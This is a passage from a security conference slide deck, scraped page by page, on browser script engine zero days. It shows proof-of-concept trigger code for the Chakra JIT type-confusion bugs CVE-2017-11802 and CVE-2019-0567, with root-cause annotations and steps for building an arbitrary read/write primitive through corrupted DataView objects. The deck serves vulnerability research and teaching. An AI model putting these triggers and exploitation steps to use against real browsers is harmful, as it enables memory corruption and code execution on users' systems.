![Page 55: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/55.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
foo(obj);
}
for(let i=0; i < 0x10000; i++) {
opt(obj1);
}
opt(obj2);
Force opt() to be JITed and optimized
![Page 56: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/56.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
foo(obj);
}
for(let i=0; i < 0x10000; i++) {
opt(obj1);
}
opt(obj2);
JITed opt() makes assumption on obj type
and bailout if type check fail
![Page 57: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/57.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
foo(obj);
}
for(let i=0; i < 0x10000; i++) {
opt(obj1);
}
opt(obj2);
foo() has side effect may change obj type
![Page 58: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/58.jpg)
Chakra JIT Type Confusion
• Example
function opt(obj) {
foo(obj);
}
for(let i=0; i < 0x10000; i++) {
opt(obj1);
}
opt(obj2); Call opt() JITed code directly,
and if JITed code not check obj2 type if changed by foo(),
Type Confusion happened!
![Page 59: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/59.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
![Page 60: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/60.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
Define one JavascriptFloatArray
![Page 61: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/61.jpg)
Chakra JIT Type Confusion
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
for loop force opt() to be JITed and optimized
• Case Study: CVE-2017-11802 : Root Cause
![Page 62: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/62.jpg)
Chakra JIT Type Confusion
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
|replace| will trigger ImplicitCall callback
• Case Study: CVE-2017-11802 : Root Cause
![Page 63: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/63.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
Call opt() JITed code directly
![Page 64: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/64.jpg)
Chakra JIT Type Confusion
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
|replace| will trigger ImplicitCall callback
| arr[0]={}| will change the Array type from
JavascriptNativeFloatArray to JavascriptArray
• Case Study: CVE-2017-11802 : Root Cause
![Page 65: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/65.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
JITed opt() still assumes arr type is JavascriptNativeFloatArray.
Type confusion happened!
opt JITed Code
![Page 66: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/66.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Root Cause
let arr = [1.1, 1.2];
function opt(f) {
arr[0] = 1.1;
arr[1] = 2.3023e-320 + parseInt('a'.replace('a', f));
return 1;
}
for (var i = 0; i < 0x10000; i++)
opt(()=>{return '0';});
opt(()=>{ arr[0]={}; return '0';});
//trigger exception
arr[1].toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2017-11802
![Page 67: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/67.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Patch
![Page 68: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/68.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Patch
![Page 69: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/69.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2017-11802 : Patch
![Page 70: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/70.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
![Page 71: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/71.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
Create two objects
![Page 72: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/72.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
for loop force opt() to be JITed and optimized
![Page 73: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/73.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
|{__proto__:obj2}| make obj2 to be the prototype of
some object
![Page 74: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/74.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
Call opt() JITed code directly
![Page 75: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/75.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
|{__proto__:obj1}| make obj1 to be the prototype of
some object
![Page 76: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/76.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
|{__proto__:obj1}| make obj1 to be the prototype of
some object
![Page 77: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/77.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
JITed opt() does not know the change.
Type confusion happened!
![Page 78: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/78.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
JITed opt() does not know the change of obj1 memory laylout.
Type confusion happened!
![Page 79: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/79.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Root Cause
function opt(obj1, obj2) {
obj1.b = 1;
let tmp = {__proto__:obj2};
obj1.a = 0x1234;
}
obj1 = {a:1, b:2 };
obj2 = {};
for(let i=0; i<0x10000; i++)
opt(obj1, obj2);
opt(obj1, obj1);
//trigger exception
obj1.a.toString();
From: https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=CVE-2019-0567
![Page 80: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/80.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Patch
• Before patch: lowerer
![Page 81: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/81.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Patch
![Page 82: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/82.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Patch
• After patch: lowerer
![Page 83: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/83.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• auxslots can be controlled by script
• goal is to get R/W primitive
• need to corrupt some object to exploit
![Page 84: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/84.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• DateView
var buffer = new ArrayBuffer(0x123);
var dv = new DataView(buffer);
dv.setUint32(0, 0x12345678, true);
![Page 85: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/85.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
vtable
type
auxslots
vtable
type
auxslots
vtable
type
auxslots
objectArrayobjectArray objectArray
length
arrayBuffer
byteOffset
buffer
vtable
type
auxslots
objectArray
length
arrayBuffer
byteOffset
buffer
obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)
obj1.a
obj1.b
obj1.c
obj3.a
obj3.b
obj3.c
obj3.d
obj3.e
obj3.f
obj3.g
obj3.h
![Page 86: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/86.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
vtable
type
auxslots
vtable
type
auxslots
vtable
type
auxslots
objectArrayobjectArray objectArray
length
arrayBuffer
byteOffset
buffer
vtable
type
auxslots
objectArray
length
arrayBuffer
byteOffset
buffer
obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)
obj1.a
obj1.b
obj1.c
obj3.a
obj3.b
obj3.c
obj3.d
obj3.e
obj3.f
obj3.g
obj3.h
Step1. Trigger bug and set obj1->auxSlots = obj3
opt(obj1, obj1, obj3);
![Page 87: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/87.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
vtable
type
auxslots
vtable
type
auxslots
vtable
type
auxslots
objectArrayobjectArray objectArray
length
arrayBuffer
byteOffset
buffer
vtable
type
auxslots
objectArray
length
arrayBuffer
byteOffset
buffer
obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)
obj1.a
obj1.b
obj1.c
obj3.a
obj3.b
obj3.c
obj3.d
obj3.e
obj3.f
obj3.g
obj3.h
Step2. Set obj3->auxSlots = dv1
obj1.c = dv1;
![Page 88: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/88.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
vtable
type
auxslots
vtable
type
auxslots
vtable
type
auxslots
objectArrayobjectArray objectArray
length
arrayBuffer
byteOffset
buffer
vtable
type
auxslots
objectArray
length
arrayBuffer
byteOffset
buffer
obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)
obj1.a
obj1.b
obj1.c
obj3.a
obj3.b
obj3.c
obj3.d
obj3.e
obj3.f
obj3.g
obj3.h
Step3. Set dv1->buffer = dv2
obj3.h = dv2;
![Page 89: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/89.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Exploit Memory Layout – R/W Primitive
vtable
type
auxslots
vtable
type
auxslots
vtable
type
auxslots
objectArrayobjectArray objectArray
length
arrayBuffer
byteOffset
buffer
vtable
type
auxslots
objectArray
length
arrayBuffer
byteOffset
buffer
obj1 (DynamicObject) obj3 (DynamicObject) dv1 (DataView) dv2 (DataView)
obj1.a
obj1.b
obj1.c
obj3.a
obj3.b
obj3.c
obj3.d
obj3.e
obj3.f
obj3.g
obj3.h
Step4. Get arbitrary R/W primitive
by corrupting dv2's buffer
dv1.setUint32(0x38, addr_lo, true);
dv1.setUint32(0x3c, addr_hi, true)
![Page 90: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/90.jpg)
Chakra JIT Type Confusion
• Case Study: CVE-2019-0567 : Exploit
• Leak chakra base address
![Page 91: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/91.jpg)
Demo
![Page 92: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/92.jpg)
Conclusion
• Flash is still the main target of attackers. As Adobe will stop updating Flash at the end of 2020, the number of Flash zero days attacks maybe decrease.
• In 2018, some old script engines began to be the target of attackers, such as VBScript and JScript. Maybe more zero days attacks will be discovered in these script engines in the future.
• VBSEmulator is one tool can use to do some vbscript deobfuscation and detect possible unknown exploit.
• The new JavaScript engine Chakra seems vulnerable, especially JIT compiler. Type confusion is easy to exploit.
![Page 93: Browser Script Engine Zero Days in 2018€¦ · VBScript Zero Days in 2018 • CVE-2018-8174 Dim arr(1) Dim o Class MyClass Private Sub Class_Terminate Set o = arr(0) arr(0) = &h12345678](https://reader034.fdocuments.net/reader034/viewer/2022052017/602fb3276a95150aa774bf56/html5/thumbnails/93.jpg)
Thank You!